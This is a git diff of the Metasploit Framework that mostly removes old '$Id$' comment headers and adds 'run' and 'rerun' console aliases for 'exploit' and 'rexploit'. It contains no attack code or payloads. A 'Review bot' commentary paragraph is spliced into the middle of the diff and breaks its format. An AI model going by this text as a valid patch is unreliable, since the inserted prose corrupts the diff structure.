diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb index 028ce427ab..a170e6f4f5 100644 --- a/lib/msf/base/sessions/command_shell_options.rb +++ b/lib/msf/base/sessions/command_shell_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 2f8b79580a..84b827933d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' require 'msf/base/sessions/scriptable' diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb index c92e58e782..2c393c31fd 100644 --- a/lib/msf/base/sessions/meterpreter_java.rb +++ b/lib/msf/base/sessions/meterpreter_java.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index c44b8c6f5e..16942f0270 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'shellwords' diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb index 2ba47c2c03..98e564567b 100644 --- a/lib/msf/base/sessions/meterpreter_php.rb +++ b/lib/msf/base/sessions/meterpreter_php.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb index 1f851e270c..d6fb7b27d8 100644 --- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb +++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' 
diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 33e72d1be9..45ba0b910a 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb index 2f44f0e640..c3ec8ee2cc 100644 --- a/lib/msf/base/sessions/meterpreter_x86_win.rb +++ b/lib/msf/base/sessions/meterpreter_x86_win.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' require 'msf/windows_error' diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb index acaad4629d..400deedc56 100644 --- a/lib/msf/base/sessions/tty.rb +++ b/lib/msf/base/sessions/tty.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 1ae2954ceb..80d4930abe 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf module Sessions diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 3e2b0aff30..7b31207d63 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 59357b1255..7415993b76 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb index ae145c81be..72963b59af 100644 --- a/lib/msf/core/auxiliary/commandshell.rb +++ b/lib/msf/core/auxiliary/commandshell.rb 
@@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/command_shell_options' diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 3072a44907..88012bca00 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb index 3630f08835..9f50b9d17f 100644 --- a/lib/msf/core/auxiliary/pii.rb +++ b/lib/msf/core/auxiliary/pii.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -### -# $Id$ -### module Msf diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 25671464df..737b3415c6 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 2cdf6a66a1..afccaab26d 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core' diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index f4b63f8251..1ee518d714 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index c99d29064f..4cb43ff7e1 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/cmdstager' require 'msf/core/exploit/exe' 
diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index 508307a25d..41b9bd43c8 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index 8b73ac8adf..964a5e8d00 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb +++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 5549a687bd..aae3b0bf2b 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'msf/core/exploit/tftp' diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 1247d118a7..05ae9acc74 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index b6a082a2a1..3a19611a2e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb +++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb index 455c204d84..baac9dec9f 100644 --- a/lib/msf/core/exploit/dhcp.rb +++ b/lib/msf/core/exploit/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb index 31db349cc1..20fc6f0988 100644 
--- a/lib/msf/core/exploit/egghunter.rb +++ b/lib/msf/core/exploit/egghunter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/egghunter' diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb index e4d632d0ef..49ee94e3e5 100644 --- a/lib/msf/core/exploit/exe.rb +++ b/lib/msf/core/exploit/exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb index 7de70ff6e9..39ea610dce 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -7,7 +7,6 @@ module Msf # in a more intelligent way. # # Author: jduck -# $Id$ ### module Exploit::FormatString diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 7be24e6aec..d6f81faf8d 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 709457ffa0..431488690d 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # All exploit mixins should be added to the list below # diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a9..e8dd2ac0bf 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb index 41d7905fd4..e5945812a6 100644 --- a/lib/msf/core/exploit/omelet.rb +++ b/lib/msf/core/exploit/omelet.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/omelet' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 630d8dc579..9f3c4777d6 100644 --- a/lib/msf/core/exploit/pdf.rb 
+++ b/lib/msf/core/exploit/pdf.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/php_exe.rb b/lib/msf/core/exploit/php_exe.rb index 3c59f568ed..0a768a436e 100644 --- a/lib/msf/core/exploit/php_exe.rb +++ b/lib/msf/core/exploit/php_exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 3681c0f2bf..57b7b167af 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 8a7655055f..ba0b65bf24 100644 --- a/lib/msf/core/exploit/telnet.rb +++ b/lib/msf/core/exploit/telnet.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb index c20250f5d8..a75ab290f4 100644 --- a/lib/msf/core/exploit/tftp.rb +++ b/lib/msf/core/exploit/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 660d29f45d..a8e8e89d01 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # This mixin enables executing arbitrary commands via the diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index 5ad8a42568..5e3f9b510a 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb index 05854d12df..dc128e3d18 100644 --- a/lib/msf/core/payload/windows/loadlibrary.rb +++ b/lib/msf/core/payload/windows/loadlibrary.rb 
@@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 0a112be7f7..f831730fe1 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $ -## module Msf module RPC diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index f2d536ac17..9c7327002b 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -33,7 +33,9 @@ class Exploit "exploit" => "Launch an exploit attempt", "rcheck" => "Reloads the module and checks if the target is vulnerable", "rexploit" => "Reloads the module and launches an exploit attempt", - "reload" => "Just reloads the module" + "reload" => "Just reloads the module", + "run" => "Alias for exploit", + "rerun" => "Alias for rexploit", }) end @@ -197,6 +199,8 @@ class Exploit end end + alias cmd_run cmd_exploit + def cmd_exploit_help print_line "Usage: exploit [options]" print_line @@ -204,6 +208,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_run_help cmd_exploit_help + # # Reloads an exploit module and checks the target to see if it's # vulnerable. @@ -227,6 +233,8 @@ class Exploit end end + alias cmd_rerun cmd_rexploit + def cmd_rexploit_help print_line "Usage: rexploit [options]" print_line @@ -234,6 +242,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_rerun_help cmd_rexploit_help + # # Picks a reasonable payload and minimally configures it # diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 8b6a248384..65a41f1650 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb 
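Review bot: The aliases added in the `-197,6`, `-204,6`, `-227,6` and `-234,6` hunks of command_dispatcher/exploit.rb copy the target method at the point of the `alias`, so a subclass or plugin that later overrides `cmd_exploit`/`cmd_rexploit` is not reached through `run`/`rerun`; that is fine if intended, but worth a comment such as `# run/rerun are frozen copies of exploit/rexploit; override both if you override one`, and the class-body form `alias_method :cmd_run, :cmd_exploit` reads more consistently with the surrounding macro-style declarations. If the dispatcher also defines `cmd_exploit_tabs` or `cmd_rexploit_tabs` outside these hunks (not visible here), `run` and `rerun` silently lose tab completion unless `alias cmd_run_tabs cmd_exploit_tabs` and `alias cmd_rerun_tabs cmd_rexploit_tabs` are added next to the help aliases. `cmd_run_help` still prints `Usage: exploit [options]`, so `run -h` names a command other than the one typed; either print a dedicated usage line or extend the description in the commands hash to `"run" => "Alias for exploit (same options)"`. The `commands` method holding the first hunk starts outside the hunk.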
@@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/parser/arguments' diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb index 94053f8e52..42c2d175fa 100644 --- a/lib/msf/windows_error.rb +++ b/lib/msf/windows_error.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # Windows system error codes (0-499) diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb index a9f891066a..abe5e626ee 100644 --- a/lib/rex/elfparsey.rb +++ b/lib/rex/elfparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb index 9d9811f6d5..33061fe6e4 100644 --- a/lib/rex/elfparsey/elf.rb +++ b/lib/rex/elfparsey/elf.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/elfparsey/elfbase' require 'rex/elfparsey/exceptions' require 'rex/image_source' diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb index be5691e2d8..d91ba7aee1 100644 --- a/lib/rex/elfparsey/elfbase.rb +++ b/lib/rex/elfparsey/elfbase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/struct2' module Rex diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb index 4e3804424f..5437246afe 100644 --- a/lib/rex/elfparsey/exceptions.rb +++ b/lib/rex/elfparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb index d3e66affbc..38c9706690 100644 --- a/lib/rex/elfscan.rb +++ b/lib/rex/elfscan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 115aa0977d..244ee7e728 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,7 +1,5 @@ # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Scanner 
diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb index 80f7be017c..cb0e9292f1 100644 --- a/lib/rex/elfscan/search.rb +++ b/lib/rex/elfscan/search.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Search diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb index 3607fb4ea7..e646e291f1 100644 --- a/lib/rex/exploitation/cmdstager/tftp.rb +++ b/lib/rex/exploitation/cmdstager/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rex/arch' diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb index 2c8d51299a..32bc87f640 100644 --- a/lib/rex/exploitation/jsobfu.rb +++ b/lib/rex/exploitation/jsobfu.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rkelly' diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb index 1cf4a94a8d..f7f3ff1c44 100644 --- a/lib/rex/image_source.rb +++ b/lib/rex/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 0b3f5faa83..f37b7be47f 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 549388fc4e..4d6e428e06 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource class ImageSource diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb index c75be1881f..3f27990324 100644 --- a/lib/rex/image_source/memory.rb +++ b/lib/rex/image_source/memory.rb 
@@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb index d2a0407134..38f6f4924a 100644 --- a/lib/rex/ole.rb +++ b/lib/rex/ole.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb index e697dd121d..b6458c903e 100644 --- a/lib/rex/ole/clsid.rb +++ b/lib/rex/ole/clsid.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb index 52ab121b4c..825a1089b4 100644 --- a/lib/rex/ole/difat.rb +++ b/lib/rex/ole/difat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 4b91038686..464a073ebd 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb index c6f634691a..a546a6e32b 100644 --- a/lib/rex/ole/direntry.rb +++ b/lib/rex/ole/direntry.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb index 2edb3de8ac..0adc2aa30d 100644 --- a/lib/rex/ole/fat.rb +++ b/lib/rex/ole/fat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index b24eef4e31..a6341e7636 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation 
diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb index 1e9bbdb0e3..df2b073582 100644 --- a/lib/rex/ole/minifat.rb +++ b/lib/rex/ole/minifat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb index 8a1812d96c..f5c94a602a 100644 --- a/lib/rex/ole/propset.rb +++ b/lib/rex/ole/propset.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 55f6259a60..fc6a15797a 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb index fd7e36d050..8d2ea7f3d5 100644 --- a/lib/rex/ole/stream.rb +++ b/lib/rex/ole/stream.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb index 1e14440853..b60a8714fb 100644 --- a/lib/rex/ole/substorage.rb +++ b/lib/rex/ole/substorage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb index 5712e598c8..90da72d3c9 100644 --- a/lib/rex/ole/util.rb +++ b/lib/rex/ole/util.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb index 6e6addffe7..22916826fd 100644 --- a/lib/rex/peparsey.rb +++ b/lib/rex/peparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb index 45951f8322..359b2807fd 100644 
--- a/lib/rex/peparsey/exceptions.rb +++ b/lib/rex/peparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb index 3966e06f0b..de895159e3 100644 --- a/lib/rex/peparsey/pe.rb +++ b/lib/rex/peparsey/pe.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index 85f118f8c7..eef2ab7a53 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index bf268e6b36..5a3e5247b9 100644 --- a/lib/rex/peparsey/pebase.rb +++ b/lib/rex/peparsey/pebase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/struct2' diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index 392b42f067..8110cc071e 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' require 'rex/struct2' diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb index 163c6f0db5..9483abc15f 100644 --- a/lib/rex/pescan.rb +++ b/lib/rex/pescan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeScan diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb index 9a8a036f84..d28ae0bf8b 100644 --- a/lib/rex/proto/dhcp.rb +++ b/lib/rex/proto/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # DHCP Server support written by scriptjunkie # 
diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb index c99d74f1bc..96e2829691 100644 --- a/lib/rex/proto/dhcp/constants.rb +++ b/lib/rex/proto/dhcp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' module Rex diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb index abfd39d2d0..1dccbc0c09 100644 --- a/lib/rex/proto/dhcp/server.rb +++ b/lib/rex/proto/dhcp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/dhcp' diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb index f7a99efcfb..3885f29b85 100644 --- a/lib/rex/proto/ntlm/crypt.rb +++ b/lib/rex/proto/ntlm/crypt.rb @@ -43,10 +43,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ - require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/base' diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb index a8c678e877..efe5f7ec4d 100644 --- a/lib/rex/proto/ntlm/message.rb +++ b/lib/rex/proto/ntlm/message.rb @@ -40,9 +40,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ #this module defines the message class , useful for easily handling type 1/2/3 ntlm messages diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb index 378bc1428b..623f780b29 100644 --- a/lib/rex/proto/rfb.rb +++ b/lib/rex/proto/rfb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ # # RFB protocol support # diff --git 